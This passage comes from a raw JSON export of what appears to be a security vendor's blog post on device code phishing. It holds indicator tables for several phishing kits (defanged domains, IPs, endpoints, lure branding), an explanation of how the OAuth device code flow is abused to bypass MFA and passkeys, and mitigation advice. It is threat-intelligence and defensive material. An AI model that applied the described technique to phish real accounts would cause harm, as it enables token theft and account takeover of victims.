hosting",[],{},{"nodeType":4295,"data":5547,"content":5548},{},[5549,5559],{"nodeType":4299,"data":5550,"content":5551},{},[5552],{"nodeType":1258,"data":5553,"content":5554},{},[5555],{"nodeType":1257,"value":4414,"marks":5556,"data":5558},[5557],{"type":1318},{},{"nodeType":4299,"data":5560,"content":5561},{},[5562],{"nodeType":1258,"data":5563,"content":5564},{},[5565],{"nodeType":1257,"value":5566,"marks":5567,"data":5568},"POST /api/v1/loader",[],{},{"nodeType":4295,"data":5570,"content":5571},{},[5572,5582],{"nodeType":4299,"data":5573,"content":5574},{},[5575],{"nodeType":1258,"data":5576,"content":5577},{},[5578],{"nodeType":1257,"value":4466,"marks":5579,"data":5581},[5580],{"type":1318},{},{"nodeType":4299,"data":5583,"content":5584},{},[5585],{"nodeType":1258,"data":5586,"content":5587},{},[5588],{"nodeType":1257,"value":5589,"marks":5590,"data":5591},"MS login clone (\"Sign in to your account\"), \"Office 365\" branding, fake \"Powered by Okta\" footer",[],{},{"nodeType":4295,"data":5593,"content":5594},{},[5595,5605],{"nodeType":4299,"data":5596,"content":5597},{},[5598],{"nodeType":1258,"data":5599,"content":5600},{},[5601],{"nodeType":1257,"value":4689,"marks":5602,"data":5604},[5603],{"type":1318},{},{"nodeType":4299,"data":5606,"content":5607},{},[5608],{"nodeType":1258,"data":5609,"content":5610},{},[5611],{"nodeType":1257,"value":5612,"marks":5613,"data":5614},"redirect-523346-d95027ec[.]s3.amazonaws.com",[],{},{"nodeType":1335,"data":5616,"content":5620},{"target":5617},{"sys":5618},{"id":5619,"type":1340,"linkType":1341},"6WFXqUDzcJHKWSwVIcDZAf",[],{"nodeType":1307,"data":5622,"content":5623},{},[],{"nodeType":1468,"data":5625,"content":5626},{},[5627],{"nodeType":1257,"value":5628,"marks":5629,"data":5631},"“DCSTATUS”",[5630],{"type":1318},{},{"nodeType":4291,"data":5633,"content":5634},{},[5635,5657,5680,5703],{"nodeType":4295,"data":5636,"content":5637},{},[5638,5648],{"nodeType":4299,"data":5639,"content":5640},{},[5641],{"nodeType":1258,"data":5642,"content":5643},{},[5644],{"nodeType":1257,"value":4306,"marks":5645,"data":5647},[5646],{"type":1318},{},{"nodeType":4299,"data":5649,"content":5650},{},[5651],{"nodeType":1258,"data":5652,"content":5653},{},[5654],{"nodeType":1257,"value":4591,"marks":5655,"data":5656},[],{},{"nodeType":4295,"data":5658,"content":5659},{},[5660,5670],{"nodeType":4299,"data":5661,"content":5662},{},[5663],{"nodeType":1258,"data":5664,"content":5665},{},[5666],{"nodeType":1257,"value":4414,"marks":5667,"data":5669},[5668],{"type":1318},{},{"nodeType":4299,"data":5671,"content":5672},{},[5673],{"nodeType":1258,"data":5674,"content":5675},{},[5676],{"nodeType":1257,"value":5677,"marks":5678,"data":5679},"GET /dc/status/{base64url_sid}",[],{},{"nodeType":4295,"data":5681,"content":5682},{},[5683,5693],{"nodeType":4299,"data":5684,"content":5685},{},[5686],{"nodeType":1258,"data":5687,"content":5688},{},[5689],{"nodeType":1257,"value":4466,"marks":5690,"data":5692},[5691],{"type":1318},{},{"nodeType":4299,"data":5694,"content":5695},{},[5696],{"nodeType":1258,"data":5697,"content":5698},{},[5699],{"nodeType":1257,"value":5700,"marks":5701,"data":5702},"Generic \"Microsoft 365 - Secure Access\" verification page",[],{},{"nodeType":4295,"data":5704,"content":5705},{},[5706,5716],{"nodeType":4299,"data":5707,"content":5708},{},[5709],{"nodeType":1258,"data":5710,"content":5711},{},[5712],{"nodeType":1257,"value":4689,"marks":5713,"data":5715},[5714],{"type":1318},{},{"nodeType":4299,"data":5717,"content":5718},{},[5719],{"nodeType":1258,"data":5720,"content":5721},{},[5722],{"nodeType":1257,"value":5723,"marks":5724,"data":5725},"owa[.]apmmacleans[.]ca",[],{},{"nodeType":1335,"data":5727,"content":5731},{"target":5728},{"sys":5729},{"id":5730,"type":1340,"linkType":1341},"ugYhHeXY1lQdKooALmrIs",[],{"nodeType":1307,"data":5733,"content":5734},{},[],{"nodeType":1468,"data":5736,"content":5737},{},[5738],{"nodeType":1257,"value":5739,"marks":5740,"data":5742},"“DOLCE”",[5741],{"type":1318},{},{"nodeType":1335,"data":5744,"content":5748},{"target":5745},{"sys":5746},{"id":5747,"type":1340,"linkType":1341},"7TzU6kk01Un45NB0buEz2",[],{"nodeType":4291,"data":5750,"content":5751},{},[5752,5775,5813,5836,5859],{"nodeType":4295,"data":5753,"content":5754},{},[5755,5765],{"nodeType":4299,"data":5756,"content":5757},{},[5758],{"nodeType":1258,"data":5759,"content":5760},{},[5761],{"nodeType":1257,"value":4306,"marks":5762,"data":5764},[5763],{"type":1318},{},{"nodeType":4299,"data":5766,"content":5767},{},[5768],{"nodeType":1258,"data":5769,"content":5770},{},[5771],{"nodeType":1257,"value":5772,"marks":5773,"data":5774},"Microsoft PowerApps hosting",[],{},{"nodeType":4295,"data":5776,"content":5777},{},[5778,5788],{"nodeType":4299,"data":5779,"content":5780},{},[5781],{"nodeType":1258,"data":5782,"content":5783},{},[5784],{"nodeType":1257,"value":4330,"marks":5785,"data":5787},[5786],{"type":1318},{},{"nodeType":4299,"data":5789,"content":5790},{},[5791,5802],{"nodeType":1258,"data":5792,"content":5793},{},[5794,5798],{"nodeType":1257,"value":4766,"marks":5795,"data":5797},[5796],{"type":1318},{},{"nodeType":1257,"value":5799,"marks":5800,"data":5801},"34.53.159.84 (Google Cloud AS396982)",[],{},{"nodeType":1258,"data":5803,"content":5804},{},[5805,5809],{"nodeType":1257,"value":4371,"marks":5806,"data":5808},[5807],{"type":1318},{},{"nodeType":1257,"value":5810,"marks":5811,"data":5812}," Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36",[],{},{"nodeType":4295,"data":5814,"content":5815},{},[5816,5826],{"nodeType":4299,"data":5817,"content":5818},{},[5819],{"nodeType":1258,"data":5820,"content":5821},{},[5822],{"nodeType":1257,"value":4414,"marks":5823,"data":5825},[5824],{"type":1318},{},{"nodeType":4299,"data":5827,"content":5828},{},[5829],{"nodeType":1258,"data":5830,"content":5831},{},[5832],{"nodeType":1257,"value":5833,"marks":5834,"data":5835},"GET /api/generatecode (CloudFront)",[],{},{"nodeType":4295,"data":5837,"content":5838},{},[5839,5849],{"nodeType":4299,"data":5840,"content":5841},{},[5842],{"nodeType":1258,"data":5843,"content":5844},{},[5845],{"nodeType":1257,"value":4466,"marks":5846,"data":5848},[5847],{"type":1318},{},{"nodeType":4299,"data":5850,"content":5851},{},[5852],{"nodeType":1258,"data":5853,"content":5854},{},[5855],{"nodeType":1257,"value":5856,"marks":5857,"data":5858},"Dolce & Gabbana branded, Italian language, MS account verification",[],{},{"nodeType":4295,"data":5860,"content":5861},{},[5862,5872],{"nodeType":4299,"data":5863,"content":5864},{},[5865],{"nodeType":1258,"data":5866,"content":5867},{},[5868],{"nodeType":1257,"value":4689,"marks":5869,"data":5871},[5870],{"type":1318},{},{"nodeType":4299,"data":5873,"content":5874},{},[5875],{"nodeType":1258,"data":5876,"content":5877},{},[5878],{"nodeType":1257,"value":5879,"marks":5880,"data":5881},"data-migration-dolcegabbana[.]powerappsportals.com",[],{},{"nodeType":1335,"data":5883,"content":5887},{"target":5884},{"sys":5885},{"id":5886,"type":1340,"linkType":1341},"4ayQDvpf5NNOBrj9wZZRiO",[],{"nodeType":3714,"data":5889,"content":5890},{},[5891],{"nodeType":1258,"data":5892,"content":5893},{},[5894],{"nodeType":1257,"value":5895,"marks":5896,"data":5897},"Clearly, device code phishing has entered mainstream adoption and we should be prepared for a lot more of it in future. So how does it work, and why is it so effective?",[],{},{"nodeType":1307,"data":5899,"content":5900},{},[],{"nodeType":1311,"data":5902,"content":5903},{},[5904],{"nodeType":1257,"value":5905,"marks":5906,"data":5908},"Device code phishing under the hood",[5907],{"type":1318},{},{"nodeType":1258,"data":5910,"content":5911},{},[5912,5916],{"nodeType":1257,"value":5913,"marks":5914,"data":5915},"The attacker POSTs to the authorization server's device authorization endpoint with its client_id (i.e. an application ID) and requested scopes or resources. The server responds with a device_code (used for polling), a user_code, a verification_uri, an expires_in value, and a polling interval. The user visits the URL, enters the code and approves the request. Meanwhile, the device polls the token endpoint. Once approved, the server returns an access token, a refresh token (if offline_access was requested), and an ID token (if openid was included). ",[],{},{"nodeType":1257,"value":5917,"marks":5918,"data":5920},"The attacker now has API access to the victim's account. ",[5919],{"type":1318},{},{"nodeType":1258,"data":5922,"content":5923},{},[5924],{"nodeType":1257,"value":5925,"marks":5926,"data":5927},"Broadly, this gives the attacker a comparable level of control to a “normal” phishing attack (with conditions based on the scopes granted and specific app being targeted) while API access grants additional capabilities beyond standard browser sessions. When combined with other techniques, this access can be exchanged to open normal browser app sessions and access SSO connected apps (e.g. the PRT escalation technique for Microsoft that I mentioned in earlier research).",[],{},{"nodeType":1335,"data":5929,"content":5933},{"target":5930},{"sys":5931},{"id":5932,"type":1340,"linkType":1341},"1x7Lip7JdY2xlHKKurT7qJ",[],{"nodeType":1258,"data":5935,"content":5936},{},[5937],{"nodeType":1257,"value":5938,"marks":5939,"data":5940},"At this point, you can achieve a number of objectives both inside the app ecosystem and across SSO connected apps — e.g. data theft, disruption, and ultimately extortion.",[],{},{"nodeType":1258,"data":5942,"content":5943},{},[5944,5948,5953,5957],{"nodeType":1257,"value":5945,"marks":5946,"data":5947},"Critically, the initial request to generate a device code is typically ",[],{},{"nodeType":1257,"value":5949,"marks":5950,"data":5952},"unauthenticated",[5951],{"type":1318},{},{"nodeType":1257,"value":5954,"marks":5955,"data":5956}," across all providers — ",[],{},{"nodeType":1257,"value":5958,"marks":5959,"data":5961},"anyone can generate one, from any machine, without proving any relationship to the target organization.",[5960],{"type":1318},{},{"nodeType":1258,"data":5963,"content":5964},{},[5965,5969,5974],{"nodeType":1257,"value":5966,"marks":5967,"data":5968},"So, the attacker has to deliver a set of instructions via a phishing channel (e.g. email, social media DM, corp IM platform, and so on) with a device code that they have generated. The victim then enters this code on the ",[],{},{"nodeType":1257,"value":5970,"marks":5971,"data":5973},"legitimate device code login page",[5972],{"type":1318},{},{"nodeType":1257,"value":5975,"marks":5976,"data":5977}," for that app and issues the tokens to the attacker.",[],{},{"nodeType":1335,"data":5979,"content":5983},{"target":5980},{"sys":5981},{"id":5982,"type":1340,"linkType":1341},"1txUYuQjH9FlbDGTo8AbZB",[],{"nodeType":1468,"data":5985,"content":5986},{},[5987],{"nodeType":1257,"value":5988,"marks":5989,"data":5991},"First-party vs. third-party apps",[5990],{"type":1318},{},{"nodeType":1258,"data":5993,"content":5994},{},[5995,6000,6004,6014],{"nodeType":1257,"value":5996,"marks":5997,"data":5999},"First-party applications",[5998],{"type":1318},{},{"nodeType":1257,"value":6001,"marks":6002,"data":6003}," are commonly abused in Microsoft-targeted attacks. These are ",[],{},{"nodeType":1364,"data":6005,"content":6007},{"uri":6006},"https://gist.github.com/dafthack/2c0bbcac72b10c1ee205d1dd2fed3fe7",[6008],{"nodeType":1257,"value":6009,"marks":6010,"data":6013},"real Microsoft applications",[6011,6012],{"type":1372},{"type":1318},{},{"nodeType":1257,"value":6015,"marks":6016,"data":6017}," registered in every Entra ID tenant. Not only are they allowed by default (unlike third-party apps that are often subject to additional restrictions and require additional tenant-level consent before they can be accessed by a user), they come with pre-consented permissions, and can even access undocumented “legacy” scopes. ",[],{},{"nodeType":1258,"data":6019,"content":6020},{},[6021],{"nodeType":1257,"value":6022,"marks":6023,"data":6024},"Many Microsoft first-party apps also belong to the Family of Client IDs (FOCI), meaning a refresh token obtained for one family member can be exchanged for access tokens to other family members without re-authentication. This means that an attacker can silently pivot to other apps and APIs from a single phished session.",[],{},{"nodeType":1335,"data":6026,"content":6030},{"target":6027},{"sys":6028},{"id":6029,"type":1340,"linkType":1341},"ejNSC76jge1p1zzz9wwiG",[],{"nodeType":1258,"data":6032,"content":6033},{},[6034],{"nodeType":1257,"value":6035,"marks":6036,"data":6037},"In other cases third-party applications are leveraged. This doesn’t mean these are fresh, attacker created apps however (though it’s easier than ever for attackers to spin up their own OAuth apps using AI tools). They can simply be attacker-controlled instances of otherwise legitimate apps. ",[],{},{"nodeType":1307,"data":6039,"content":6040},{},[],{"nodeType":1311,"data":6042,"content":6043},{},[6044],{"nodeType":1257,"value":6045,"marks":6046,"data":6048},"Why device code phishing is so dangerous",[6047],{"type":1318},{},{"nodeType":1468,"data":6050,"content":6051},{},[6052],{"nodeType":1257,"value":6053,"marks":6054,"data":6056},"Device code phishing bypasses authentication controls (including passkeys)",[6055],{"type":1318},{},{"nodeType":1258,"data":6058,"content":6059},{},[6060,6064,6069,6073],{"nodeType":1257,"value":6061,"marks":6062,"data":6063},"A device code phishing attack ",[],{},{"nodeType":1257,"value":6065,"marks":6066,"data":6068},"cannot be prevented with authentication controls",[6067],{"type":1318},{},{"nodeType":1257,"value":6070,"marks":6071,"data":6072},". This includes all forms of MFA and ",[],{},{"nodeType":1257,"value":6074,"marks":6075,"data":6077},"even “phishing-resistant” authentication methods such as passkeys. ",[6076],{"type":1318},{},{"nodeType":1258,"data":6079,"content":6080},{},[6081,6086,6090,6095],{"nodeType":1257,"value":6082,"marks":6083,"data":6085},"The device code authorization is effectively performed post-authentication. ",[6084],{"type":1318},{},{"nodeType":1257,"value":6087,"marks":6088,"data":6089},"If you already have an active session in your browser, entering the device code and selecting your account from a drop-down menu is all that's needed. ",[],{},{"nodeType":1257,"value":6091,"marks":6092,"data":6094},"No password or MFA required. ",[6093],{"type":1318},{},{"nodeType":1257,"value":6096,"marks":6097,"data":6098},"You can see an example in the video below.",[],{},{"nodeType":1335,"data":6100,"content":6103},{"target":6101},{"sys":6102},{"id":5344,"type":1340,"linkType":1341},[],{"nodeType":1258,"data":6105,"content":6106},{},[6107],{"nodeType":1257,"value":6108,"marks":6109,"data":6110},"Even if you do have to sign in again (because you're not already signed in for some reason), the attack still works because it isn't targeting the login — it's targeting the authorization layer instead.",[],{},{"nodeType":1258,"data":6112,"content":6113},{},[6114],{"nodeType":1257,"value":6115,"marks":6116,"data":6117},"This is what makes device code phishing different to other standard phishing methods like AiTM phishing (and arguably even more effective in environments with strict identity control enforcement). ",[],{},{"nodeType":1468,"data":6119,"content":6120},{},[6121],{"nodeType":1257,"value":6122,"marks":6123,"data":6125},"Device code logins are a feature, not a vulnerability, making attacks difficult to block",[6124],{"type":1318},{},{"nodeType":1258,"data":6127,"content":6128},{},[6129,6133,6138],{"nodeType":1257,"value":6130,"marks":6131,"data":6132},"Device code authorization is a legitimate mechanism that is regularly used in an enterprise environment, particularly for CLI logins. ",[],{},{"nodeType":1257,"value":6134,"marks":6135,"data":6137},"This is a problem for security teams because the phishing attack effectively happens on the legitimate site",[6136],{"type":1318},{},{"nodeType":1257,"value":6139,"marks":6140,"data":6141},". The code is delivered to the victim via message or webpage, but the attack itself only happens when that code is entered onto the real device code login page.",[],{},{"nodeType":1258,"data":6143,"content":6144},{},[6145],{"nodeType":1257,"value":6146,"marks":6147,"data":6148},"Since there’s no traditional phishing payload being delivered on the attacker’s webpage, these sites are more resistant to detection and less likely to be flagged by email and network analysis. And in many cases, there’s no email (or webpage) to analyze at all.",[],{},{"nodeType":1258,"data":6150,"content":6151},{},[6152,6156,6165],{"nodeType":1257,"value":6153,"marks":6154,"data":6155},"Various apps can be a target, all of which implement the device code flow in slightly different ways, and also offer different levels of control and default security around these logins. For example, Google Workspace is a significantly lower risk target than Microsoft, GitHub, or AWS because ",[],{},{"nodeType":1364,"data":6157,"content":6159},{"uri":6158},"https://developers.google.com/identity/protocols/oauth2/limited-input-device",[6160],{"nodeType":1257,"value":6161,"marks":6162,"data":6164},"Google explicitly limits which scopes are available to the device code flow",[6163],{"type":1372},{},{"nodeType":1257,"value":6166,"marks":6167,"data":6168},". ",[],{},{"nodeType":1307,"data":6170,"content":6171},{},[],{"nodeType":1311,"data":6173,"content":6174},{},[6175],{"nodeType":1257,"value":6176,"marks":6177,"data":6179},"Security recommendations",[6178],{"type":1318},{},{"nodeType":1258,"data":6181,"content":6182},{},[6183],{"nodeType":1257,"value":6184,"marks":6185,"data":6186},"Security teams need to consider the risk posed by device code phishing across multiple apps where device code authorization grants are common, particularly for developers and technical users. ",[],{},{"nodeType":1258,"data":6188,"content":6189},{},[6190],{"nodeType":1257,"value":6191,"marks":6192,"data":6193},"In an ideal world, you would simply block device code logins. But this can’t be done without causing serious disruption in some environments, while some apps simply don’t provide the tools required to do so. For example, device code is the default CLI sign-in method for GitHub. Developer-heavy organizations are likely to encounter higher levels of legitimate use.",[],{},{"nodeType":1258,"data":6195,"content":6196},{},[6197,6201,6210,6214,6219,6223,6228,6232,6237],{"nodeType":1257,"value":6198,"marks":6199,"data":6200},"Microsoft arguably offers the strongest control options (other than Google, who negate it right out of the gate), though they do require a fair amount of work. ",[],{},{"nodeType":1364,"data":6202,"content":6204},{"uri":6203},"https://techcommunity.microsoft.com/blog/microsoft-entra-blog/new-microsoft-managed-policies-to-raise-your-identity-security-posture/4286758",[6205],{"nodeType":1257,"value":6206,"marks":6207,"data":6209},"Microsoft now explicitly recommends",[6208],{"type":1372},{},{"nodeType":1257,"value":6211,"marks":6212,"data":6213}," blocking device code flow for tenants that haven't used it in the past 25 days. Their guidance is to create a custom CA policy: target relevant users, set the ",[],{},{"nodeType":1257,"value":6215,"marks":6216,"data":6218},"Authentication Flows",[6217],{"type":1318},{},{"nodeType":1257,"value":6220,"marks":6221,"data":6222}," condition to block ",[],{},{"nodeType":1257,"value":6224,"marks":6225,"data":6227},"Device Code Flow",[6226],{"type":1318},{},{"nodeType":1257,"value":6229,"marks":6230,"data":6231},", and set the grant control to ",[],{},{"nodeType":1257,"value":6233,"marks":6234,"data":6236},"Block Access",[6235],{"type":1318},{},{"nodeType":1257,"value":6238,"marks":6239,"data":6240},". Deploy in report-only mode first to identify any legitimate device code usage. ",[],{},{"nodeType":1335,"data":6242,"content":6246},{"target":6243},{"sys":6244},{"id":6245,"type":1340,"linkType":1341},"mQIj2o9xRzkZYKNmanB25",[],{"nodeType":1258,"data":6248,"content":6249},{},[6250],{"nodeType":1257,"value":6251,"marks":6252,"data":6253},"For other apps, you’re mainly limited to monitoring and response. Ensuring you’re getting authentication logs for these apps is vital, and searching for unusual access patterns (e.g. unusual login protocols, having different IPs for the authorization grant and subsequent account activity). ",[],{},{"nodeType":1307,"data":6255,"content":6256},{},[],{"nodeType":1311,"data":6258,"content":6259},{},[6260],{"nodeType":1257,"value":6261,"marks":6262,"data":6264},"How Push Security can help",[6263],{"type":1318},{},{"nodeType":1258,"data":6266,"content":6267},{},[6268],{"nodeType":1257,"value":6269,"marks":6270,"data":6271},"Push customers can use our browser-based capabilities to overcome the limitations of app-level controls and detect, intercept, and shut down attacks in real time. ",[],{},{"nodeType":1258,"data":6273,"content":6274},{},[6275],{"nodeType":1257,"value":6276,"marks":6277,"data":6278},"Our research team is already tracking multiple device code phishing campaigns and toolkits, including the EvilTokens kit. Blocking controls are already in place to prevent customers from interacting with malicious pages that match our detections for these new toolkits, ensuring that these pages can be identified and blocked in real time regardless of the infrastructure. ",[],{},{"nodeType":1258,"data":6280,"content":6281},{},[6282,6286,6295],{"nodeType":1257,"value":6283,"marks":6284,"data":6285},"Using Push you can also ",[],{},{"nodeType":1364,"data":6287,"content":6289},{"uri":6288},"https://pushsecurity.com/help/can-i-use-push-to-help-protect-against-device-code-phishing-scenarios/",[6290],{"nodeType":1257,"value":6291,"marks":6292,"data":6294},"configure in-browser warnings",[6293],{"type":1372},{},{"nodeType":1257,"value":6296,"marks":6297,"data":6298}," whenever a user accesses a URL used for device code logins. This provides universal, last-mile protection against even ‘zero-day’ device code phishing attacks using previously unidentified toolkits.  ",[],{},{"nodeType":1335,"data":6300,"content":6304},{"target":6301},{"sys":6302},{"id":6303,"type":1340,"linkType":1341},"3JsbGaOKSS3INzBUJpoh1W",[],{"nodeType":1258,"data":6306,"content":6307},{},[6308],{"nodeType":1257,"value":6309,"marks":6310,"data":6311},"When a user visits those URLs, Push will also emit a webhook event that the banner was shown and acknowledged. If a user opts to proceed, you can treat this as a high-fidelity alert for your security team to investigate, providing app-agnostic telemetry that may not already be provided in your logs from that particular vendor. You can also simply use Push to block users from accessing device login pages if you’re confident that disruption won’t be caused. ",[],{},{"nodeType":1468,"data":6313,"content":6314},{},[6315],{"nodeType":1257,"value":6316,"marks":6317,"data":6319},"Learn more about Push",[6318],{"type":1318},{},{"nodeType":1258,"data":6321,"content":6322},{},[6323],{"nodeType":1257,"value":6324,"marks":6325,"data":6326},"Push Security's browser-based security platform detects and blocks browser-based attacks like AiTM phishing, credential stuffing, malicious browser extensions, ClickFix, and session hijacking. You don't need to wait until it all goes wrong either — you can use Push to proactively find and fix vulnerabilities across the apps that your employees use, like ghost logins, SSO coverage gaps, MFA gaps, vulnerable passwords, and more to harden your attack surface.",[],{},{"nodeType":1258,"data":6328,"content":6329},{},[6330,6333,6340,6343,6351,6354,6361],{"nodeType":1257,"value":2223,"marks":6331,"data":6332},[],{},{"nodeType":1364,"data":6334,"content":6335},{"uri":2228},[6336],{"nodeType":1257,"value":2231,"marks":6337,"data":6339},[6338],{"type":1372},{},{"nodeType":1257,"value":3548,"marks":6341,"data":6342},[],{},{"nodeType":1364,"data":6344,"content":6345},{"uri":3737},[6346],{"nodeType":1257,"value":6347,"marks":6348,"data":6350},"view our demo library",[6349],{"type":1372},{},{"nodeType":1257,"value":3744,"marks":6352,"data":6353},[],{},{"nodeType":1364,"data":6355,"content":6356},{"uri":2241},[6357],{"nodeType":1257,"value":2244,"marks":6358,"data":6360},[6359],{"type":1372},{},{"nodeType":1257,"value":2249,"marks":6362,"data":6363},[],{},{"entries":6365},{"hyperlink":6366,"inline":6367,"block":6368},[],[],[6369,6402,6410,6424,6438,6466,6473,6480,6486,6492,6497,6503,6506,6512,6518,6524,6530,6534,6539,6545,6550,6564,6570,6576,6590,6617,6644],{"sys":6370,"__typename":6371,"content":6372,"name":6401,"title":118},{"id":3835},"InsightTextBlockComponent",{"json":6373},{"nodeType":1259,"data":6374,"content":6375},{},[6376],{"nodeType":1258,"data":6377,"content":6378},{},[6379,6383,6388,6392,6397],{"nodeType":1257,"value":6380,"marks":6381,"data":6382},"At the start of March, we’d observed a ",[],{},{"nodeType":1257,"value":6384,"marks":6385,"data":6387},"15x",[6386],{"type":1318},{},{"nodeType":1257,"value":6389,"marks":6390,"data":6391}," increase in device code phishing pages detected by our research team this year, with multiple kits and campaigns being tracked — with the kit now identified as EvilTokens the most prominent. ",[],{},{"nodeType":1257,"value":6393,"marks":6394,"data":6396},"That figure has now risen to 37.5x",[6395],{"type":1318},{},{"nodeType":1257,"value":6398,"marks":6399,"data":6400},". More on that later. ",[],{},"DCP IB 1",{"sys":6403,"__typename":6404,"title":6405,"caption":6405,"layoutMode":118,"file":6406},{"id":3866},"Image","Device code phishing evolution 2019-2026.",{"url":6407,"width":6408,"height":6409},"https://images.ctfassets.net/y1cdw1ablpvd/7dPjgH1qTrpBIdqE0D4D0g/91a1da0abec3bbcdd94203ce2807d94c/image11.png",1360,1160,{"sys":6411,"__typename":6371,"content":6412,"name":6423,"title":118},{"id":3976},{"json":6413},{"nodeType":1259,"data":6414,"content":6415},{},[6416],{"nodeType":1258,"data":6417,"content":6418},{},[6419],{"nodeType":1257,"value":6420,"marks":6421,"data":6422},"PhaaS is key to the adoption of new phishing tools and techniques, providing broad access to criminal operators at scale while driving up execution standards. It has been central to the continued evolution of AITM and ClickFix, and is a strong indicator of what comes next for device code phishing.",[],{},"DCP IB 2",{"sys":6425,"__typename":6371,"content":6426,"name":6437,"title":118},{"id":4136},{"json":6427},{"nodeType":1259,"data":6428,"content":6429},{},[6430],{"nodeType":1258,"data":6431,"content":6432},{},[6433],{"nodeType":1257,"value":6434,"marks":6435,"data":6436},"Since EvilTokens is the only one with public attribution, the names provided are internal codenames. The information per kit is by no means exhaustive and is likely to evolve over time. ",[],{},"DCP IP 7",{"sys":6439,"__typename":6371,"content":6440,"name":6465,"title":118},{"id":4194},{"json":6441},{"nodeType":1259,"data":6442,"content":6443},{},[6444,6451,6458],{"nodeType":1258,"data":6445,"content":6446},{},[6447],{"nodeType":1257,"value":6448,"marks":6449,"data":6450},"Our codename for EvilTokens internally was derived from the overly descriptive page code describing its bot protection capabilities (a clear sign of vibe coding — thanks Claude!):",[],{},{"nodeType":1258,"data":6452,"content":6453},{},[6454],{"nodeType":1257,"value":6455,"marks":6456,"data":6457},"\u003C!-- FIXED ANTI-BOT SYSTEM - WON'T REDIRECT REAL USERS -->",[],{},{"nodeType":1258,"data":6459,"content":6460},{},[6461],{"nodeType":1257,"value":6462,"marks":6463,"data":6464},"\u003C!-- ENHANCED ANTI-BOT SYSTEM WITH SERVER-SIDE VALIDATION -->",[],{},"DCP IB3",{"sys":6467,"__typename":6404,"title":6468,"caption":6468,"layoutMode":118,"file":6469},{"id":4246},"Precursor A (Left) & B (Right): Different visual lures from January 2026. ",{"url":6470,"width":6471,"height":6472},"https://images.ctfassets.net/y1cdw1ablpvd/3pfFR7ICQQqOyhGAFAj67C/6f8873d82cc7f5233a0ca9baa74f7585/image15.png",1999,773,{"sys":6474,"__typename":6404,"title":6475,"caption":6476,"layoutMode":118,"file":6477},{"id":4252},"Early ANTIBOT: First appearance of the ANTIBOT comments, mid-Jan.","Early ANTIBOT: First appearance of the ANTIBOT comments, late-Jan.",{"url":6478,"width":6471,"height":6479},"https://images.ctfassets.net/y1cdw1ablpvd/VAdFlnCF4YftsOV02wnwu/8813ea3957b65ddfb84bb8ba5fb25a55/image6.png",564,{"sys":6481,"__typename":6482,"title":6483,"arcadeDemoUrl":6484,"playText":6485},{"id":4258},"ArcadeDemo","Early ANTIBOT page load","https://demo.arcade.software/wRcvXg62Lok57ZjOKgJI?embed","20 secs",{"sys":6487,"__typename":6404,"title":6488,"caption":6488,"layoutMode":118,"file":6489},{"id":4264},"\"Courts Access\" lure with a similar security verification to Early ANTIBOT.",{"url":6490,"width":6491,"height":262},"https://images.ctfassets.net/y1cdw1ablpvd/7LEJpoif8dnub4qJw2z6kL/3b15161c9d3f2e4f7d4f323ec04f1f33/Group_687.png",3103,{"sys":6493,"__typename":6482,"title":6494,"arcadeDemoUrl":6495,"playText":6496},{"id":4270},"ANTIBOT \"Courts Access\" lure","https://demo.arcade.software/8b4YuKm1EXPmgx2q7q2D?embed","2 mins",{"sys":6498,"__typename":6404,"title":6499,"caption":6499,"layoutMode":118,"file":6500},{"id":4276},"Production ANTIBOT: Current EvilTokens implementation.",{"url":6501,"width":6471,"height":6502},"https://images.ctfassets.net/y1cdw1ablpvd/1J3fOSmUPF8f3FlcwYFoGe/5eff8c1a892f870d1488d6a0f38da03c/image12.png",591,{"sys":6504,"__typename":6482,"title":3964,"arcadeDemoUrl":6505,"playText":6485},{"id":4282},"https://demo.arcade.software/zB6dqehj1lbnB2dur9lB?embed",{"sys":6507,"__typename":6404,"title":6508,"caption":6508,"layoutMode":118,"file":6509},{"id":4707},"SHAREFILE kit.",{"url":6510,"width":6471,"height":6511},"https://images.ctfassets.net/y1cdw1ablpvd/1iKelffs399PIIBedgnqmu/64a40d1ad7f69f966665f44c52e0817b/image1.png",1500,{"sys":6513,"__typename":6404,"title":6514,"caption":6514,"layoutMode":118,"file":6515},{"id":4858},"CLURE kit.",{"url":6516,"width":6517,"height":262},"https://images.ctfassets.net/y1cdw1ablpvd/6OWX6ynZ92THYXrFMz3HoS/999a86ab35d6711b537e1234d8b5860e/image3.png",1600,{"sys":6519,"__typename":6404,"title":6520,"caption":118,"layoutMode":118,"file":6521},{"id":5022},"LINKID landing page requires an email before serving the payload.",{"url":6522,"width":6471,"height":6523},"https://images.ctfassets.net/y1cdw1ablpvd/5XAibmWt8HDGbpOC9n1DEk/d4bcb1006d82116dff5865f5b911bc88/image9.png",1049,{"sys":6525,"__typename":6404,"title":6526,"caption":6526,"layoutMode":118,"file":6527},{"id":5180},"AUTHOV kit. Notably uses a popup like prod EvilTokens.",{"url":6528,"width":6471,"height":6529},"https://images.ctfassets.net/y1cdw1ablpvd/4wKaHuSRfMXvi056r88u0b/e77feca260fe5ceb07ea7a080a09148f/image8.png",1128,{"sys":6531,"__typename":6482,"title":6532,"arcadeDemoUrl":6533,"playText":6485},{"id":5344},"DOCUPOLL DCP Kit","https://demo.arcade.software/Wv84a7Vziha9RwTdctvg?embed",{"sys":6535,"__typename":6404,"title":6536,"caption":6536,"layoutMode":118,"file":6537},{"id":5507},"FLOW_TOKEN kit. Notably uses a popup like prod EvilTokens.",{"url":6538,"width":6471,"height":6529},"https://images.ctfassets.net/y1cdw1ablpvd/4Bvbx5dwwBTOvAzULbnhIF/2d676145af0648b1e6f43b624af3ffbc/image7.png",{"sys":6540,"__typename":6404,"title":6541,"caption":6541,"layoutMode":118,"file":6542},{"id":5619},"PAPRIKA kit.",{"url":6543,"width":6471,"height":6544},"https://images.ctfassets.net/y1cdw1ablpvd/2XqwbTyGXRBaH6OM0t9moI/107cd701784fe8eed96eea2b9c09731a/image5.png",727,{"sys":6546,"__typename":6404,"title":6547,"caption":6547,"layoutMode":118,"file":6548},{"id":5730},"DCSTATUS kit. ",{"url":6549,"width":6471,"height":6511},"https://images.ctfassets.net/y1cdw1ablpvd/1zKQp6Wi0ckDZMLHBriU2Y/7d1c7c348407dcbde2eb94551baca7f5/image14.png",{"sys":6551,"__typename":6371,"content":6552,"name":6563,"title":118},{"id":5747},{"json":6553},{"data":6554,"content":6555,"nodeType":1259},{},[6556],{"data":6557,"content":6558,"nodeType":1258},{},[6559],{"data":6560,"marks":6561,"value":6562,"nodeType":1257},{},[],"Our suspicion is that this was a one-off — potentially for a red team exercise — rather than representative of a more widely used 